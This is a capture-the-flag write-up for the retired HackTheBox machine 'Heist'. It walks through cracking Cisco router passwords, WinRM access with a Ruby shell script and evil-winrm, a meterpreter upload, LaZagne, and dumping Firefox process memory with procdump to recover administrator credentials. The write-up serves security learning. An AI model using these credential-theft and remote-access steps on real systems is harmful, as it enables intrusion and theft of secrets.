HTB: Heist

Heist card

This is a writeup about a retired HacktheBox machine: Heist This box is classified as an easy machine. It implies some CISCO router configuration, a MS Windows server with a WinRM service, a meterpreter, a tentative of Lazagne and procdump.

Recon

We start with an nmap scan.

# Nmap 7.80 scan initiated Wed Nov  6 15:29:09 2019 as: nmap -p- -sSV -oA nmap 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up (0.23s latency).
Not shown: 65530 filtered ports
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov  6 15:34:10 2019 -- 1 IP address (1 host up) scanned in 301.46 seconds

port 80: HTTP

This port is the web service.

port 135: MSRPC

Port 445: SMB

This port is for SMB.

Port 5985: WinRM

This port is used by the WinRM service

Port 49669: MSRPC

Web

We found an authentication page with an option to login as a guest. Then we see a conversation between an user and the support about a CISCO router configuration.

configuration cisco

The router configuration is the following:

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
synchronization
bgp log-neighbor-changes
bgp dampening
network 192.168.0.0Â mask 300.255.255.0
timers bgp 3 9
redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
session-timeout 600
authorization exec SSH
transport input ssh

We use a cisco type 7 decrypter to get the rout3r and admin passwords.

python ciscot7.py -d -p 0242114B0E143F015F5D1E161713
Decrypted password: $uperP@ssword
python ciscot7.py -d -p 02375012182C1A1D751618034F36415408
Decrypted password: Q4)sJu\Y8qz*A3?d

For the hashed password we use john with rockyou:

john hash -w=~/tools/password_lists/rockyou.txt
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
stealth1agent    (?)

We now have three potential users as well as three potential passwords. The users: 1. admin 2. rout3r 3. Hazard

The passwords: 1. $uperP@ssword 2. Q4)sJu\Y8qz*A3?d 3. stealth1agent

We want to connect using the WinRM service. We can use evil winrm as well as a simple ruby script:

require 'winrm'

conn = WinRM::Connection.new(
  endpoint: 'http://10.10.10.149:5985/wsman',
  user: 'rout3r',
  password: 'Q4)sJu\Y8qz*A3?d',
)

command=""

conn.shell(:powershell) do |shell|
    until command == "exit\n" do
        print "PS > "
        command = gets
        output = shell.run(command) do |stdout, stderr|
            STDOUT.print stdout
            STDERR.print stderr
        end
    end
    puts "Exiting with code #{output.exitcode}"
end

Trying all the possible combination won't give up a shell. We need more enumeration. We launch impacket's lookupsid using the different user/password combinations. One is working with the Hazard user and the stealth1agent password:

python lookupsid.py Hazard:stealth1agent@10.10.10.149
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

We have more users now! We can eliminate the stealth1agent password as this is Hazard's password. A few combination later using winrm, we discover that the user Chase use the Q4)sJu\Y8qz*A3?d password. We have a shell and the user flag:

ruby winrm.rb
PS > whoami
supportdesk\chase
PS > dir ../Desktop


    Directory: C:\Users\Chase\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   9:08 AM            121 todo.txt
-a----        4/22/2019   9:07 AM             32 user.txt


PS > type ../Desktop/user.txt
a127d<redacted>
PS > type ../Desktop/todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.

We can upload a meterpreter (generated with msfvenom) using evil winrm

evil-winrm  -i 10.10.10.149 -u ^Case -p 'Q4)sJu\Y8qz*A3?d'

The meterpreter allow us to easy enumerate the box. Let us take a look at the running process:

meterpreter > ps

Process List
============

PID   PPID  Name                     Arch  Session  User               Path
---   ----  ----                     ----  -------  ----               ----
0     0     [System Process]                                           
4     0     System                                                     
104   4     Registry                                                   
268   612   svchost.exe                                                
300   4     smss.exe                                                   
340   612   svchost.exe                                                
404   396   csrss.exe                                                  
408   612   svchost.exe                                                
480   396   wininit.exe                                                
488   472   csrss.exe                                                  
544   472   winlogon.exe                                               
612   480   services.exe                                               
632   480   lsass.exe                                                  
652   792   dllhost.exe              x64   1        SUPPORTDESK\Chase  C:\Windows\System32\dllhost.exe
684   612   svchost.exe                                                
764   612   svchost.exe                                                
784   612   svchost.exe                                                
792   612   svchost.exe                                                
812   544   fontdrvhost.exe                                            
820   480   fontdrvhost.exe                                            
904   612   svchost.exe                                                
956   612   svchost.exe                                                
984   612   svchost.exe                                                
1020  544   dwm.exe                                                    
1052  612   svchost.exe                                                
1128  612   svchost.exe                                                
1164  612   svchost.exe                                                
1184  612   svchost.exe                                                
1248  612   svchost.exe                                                
1300  612   svchost.exe                                                
1348  612   svchost.exe                                                
1356  612   svchost.exe                                                
1364  612   svchost.exe                                                
1376  612   svchost.exe                                                
1468  612   svchost.exe                                                
1512  612   svchost.exe                                                
1580  612   svchost.exe                                                
1624  612   svchost.exe                                                
1632  612   svchost.exe                                                
1720  612   svchost.exe                                                
1780  1468  taskhostw.exe                                              
1820  612   svchost.exe                                                
1896  612   svchost.exe                                                
1968  612   svchost.exe                                                
1992  612   svchost.exe                                                
2216  612   svchost.exe                                                
2564  612   spoolsv.exe                                                
2624  612   svchost.exe                                                
2632  612   svchost.exe                                                
2640  612   svchost.exe                                                
2660  612   svchost.exe                                                
2700  792   TiWorker.exe                                               
2708  612   svchost.exe                                                
2716  612   svchost.exe                                                
2740  612   svchost.exe                                                
2768  612   svchost.exe                                                
2776  612   svchost.exe                                                
2804  612   VGAuthService.exe                                          
2828  612   vmtoolsd.exe                                               
2852  612   svchost.exe                                                
2896  612   svchost.exe                                                
2920  612   svchost.exe                                                
2948  612   svchost.exe                                                
2956  612   MsMpEng.exe                                                
3024  5416  01.exe                   x64   0        SUPPORTDESK\Chase  C:\Users\Chase\Documents\01.exe
3036  612   svchost.exe                                                
3104  792   ShellExperienceHost.exe                                    
3224  612   svchost.exe                                                
3352  792   wsmprovhost.exe          x64   0        SUPPORTDESK\Chase  C:\Windows\System32\wsmprovhost.exe
3360  612   svchost.exe                                                
3376  792   wsmprovhost.exe          x64   0        SUPPORTDESK\Chase  C:\Windows\System32\wsmprovhost.exe
3720  792   wsmprovhost.exe          x64   0        SUPPORTDESK\Chase  C:\Windows\System32\wsmprovhost.exe
3784  612   svchost.exe                                                
3932  612   dllhost.exe                                                
3976  792   WmiPrvSE.exe                                               
4004  792   wsmprovhost.exe                                            
4040  612   svchost.exe                                                
4196  6808  conhost.exe                                                
4200  792   SearchUI.exe                                               
4216  792   wsmprovhost.exe          x64   0        SUPPORTDESK\Chase  C:\Windows\System32\wsmprovhost.exe
4236  612   msdtc.exe                                                  
4392  792   wsmprovhost.exe          x64   0        SUPPORTDESK\Chase  C:\Windows\System32\wsmprovhost.exe
4408  792   WmiPrvSE.exe                                               
4704  612   TrustedInstaller.exe                                       
4888  792   RuntimeBroker.exe                                          
5140  1184  sihost.exe                                                 
5148  612   svchost.exe                                                
5188  612   svchost.exe                                                
5260  1468  taskhostw.exe                                              
5352  612   svchost.exe                                                
5364  612   svchost.exe                                                
5416  792   wsmprovhost.exe          x64   0        SUPPORTDESK\Chase  C:\Windows\System32\wsmprovhost.exe
5456  612   svchost.exe                                                
5524  612   svchost.exe                                                
5572  792   RuntimeBroker.exe                                          
5584  5524  ctfmon.exe                                                 
5620  612   svchost.exe                                                
5908  5880  explorer.exe                                               
6080  3376  conhost.exe              x64   0        SUPPORTDESK\Chase  C:\Windows\System32\conhost.exe
6140  792   wsmprovhost.exe          x64   0        SUPPORTDESK\Chase  C:\Windows\System32\wsmprovhost.exe
6228  6852  firefox.exe              x64   1        SUPPORTDESK\Chase  C:\Program Files\Mozilla Firefox\firefox.exe
6304  792   RuntimeBroker.exe                                          
6388  6852  firefox.exe              x64   1        SUPPORTDESK\Chase  C:\Program Files\Mozilla Firefox\firefox.exe
6464  6672  php-cgi.exe                                                
6564  5908  vmtoolsd.exe                                               
6584  792   wsmprovhost.exe          x64   0        SUPPORTDESK\Chase  C:\Windows\System32\wsmprovhost.exe
6672  2896  w3wp.exe                                                   
6772  612   svchost.exe                                                
6792  6852  firefox.exe              x64   1        SUPPORTDESK\Chase  C:\Program Files\Mozilla Firefox\firefox.exe
6808  1468  MpCmdRun.exe                                               
6852  6676  firefox.exe              x64   1        SUPPORTDESK\Chase  C:\Program Files\Mozilla Firefox\firefox.exe
6940  612   svchost.exe                                                
6948  6672  php-cgi.exe                                                
6988  6852  firefox.exe              x64   1        SUPPORTDESK\Chase  C:\Program Files\Mozilla Firefox\firefox.exe

Our Chase user is running a Firefox Browser. The idea is to see if there is credentials stored in the browser's password manager. For that we will use LaZagne.

Lazagne

We upload the Lazagne executable using the meterpreter. Then using a shell we launch LaZagne with the browsers parameter.

meterpreter > shell
Process 3468 created.
Channel 5 created.
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Chase\Documents>.\05.exe browsers
.\05.exe browsers

|====================================================================|
|                                                                    |
|                        The LaZagne Project                         |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|====================================================================|


[+] 0 passwords have been found.
For more information launch it again with the -v option

elapsed time = 0.0

We did not found any password in the browser's password storage. Let us see what is the process memory.

procdump

We upload procdump.exe from Systinternals and dump the Firefox process memory before downloading the dump on our machine.

meterpreter > upload procdump.exe 06.exe
[*] uploading  : procdump.exe -> 06.exe
[*] Uploaded 467.19 KiB of 467.19 KiB (100.0%): procdump.exe -> 06.exe
[*] uploaded   : procdump.exe -> 06.exe

C:\Users\Chase\Documents>.\06.exe -ma 6228
.\06.exe -ma 6228

ProcDump v6.00 - Writes process dump files
Copyright (C) 2009-2013 Mark Russinovich
Sysinternals - www.sysinternals.com
With contributions from Andrew Richards

Writing dump file C:\Users\Chase\Documents\firefox_191106_223459.dmp ...
Writing 293MB. Estimated time (less than) 9 seconds.
Dump written.

meterpreter > download firefox_191106_223459.dmp ./
[*] Downloading: firefox_191106_223459.dmp -> .//firefox_191106_223459.dmp
[*] Downloaded 1.00 MiB of 286.62 MiB (0.35%): firefox_191106_223459.dmp -> .//firefox_191106_223459.dmp
[*] Downloaded 2.00 MiB of 286.62 MiB (0.7%): firefox_191106_223459.dmp -> .//firefox_191106_223459.dmp
[*] Downloaded 3.00 MiB of 286.62 MiB (1.05%): firefox_191106_223459.dmp -> .//firefox_191106_223459.dmp
[*] Downloaded 4.00 MiB of 286.62 MiB (1.4%): firefox_191106_223459.dmp -> .//firefox_191106_223459.dmp
[*] Downloaded 5.00 MiB of 286.62 MiB (1.74%): firefox_191106_223459.dmp -> .//firefox_191106_223459.dmp

We then grep in the dump for some password.

strings firefox_191106_223459.dmp | grep -i password | grep admin -i
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
RG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=

We can then use the login and password either to connect to the support website or to the server using the administrator account.

evil-winrm  -i 10.10.10.149 -u administrator -p '4dD!5}x/re8]FBuZ'

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
50dfa<redacted>

Wrapping up

In this machine we used evil-rm in to order to exploit the port 5985 as I work on this machine after the forest one this was not something new (maybe this article will be publish before the forest's one as I wait for the machine to retire). We use a simple meterpreter and proc dump to found the password stored in the Firefox memory.

I was a bit disappointed that there was no real exploitation of the CISCO router. I was hoping for some pivoting from the first VM to another one use the router or something similar.